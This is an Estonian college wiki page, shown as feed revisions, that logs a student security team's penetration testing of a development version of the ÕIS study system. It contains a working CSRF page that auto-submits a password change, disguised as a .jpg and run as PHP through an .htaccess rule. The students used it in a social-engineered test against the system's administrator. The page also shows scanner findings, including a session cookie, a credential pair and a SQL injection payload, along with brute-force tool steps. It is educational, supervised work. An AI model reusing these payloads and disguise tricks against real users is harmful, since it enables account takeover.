Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filmi&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploadida.&lt;br /&gt;
&amp;lt;br&amp;gt;Sellises kohas võiks olla süsteem tehtud &amp;lt;b&amp;gt;whitelisti&amp;lt;/b&amp;gt; põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47046</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47046"/>
		<updated>2012-03-30T13:44:34Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* 1. päev - Materjalidega tutvumine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Meida: Insecure Cryptographic Storage.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Meida: Security Misconfiguration.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
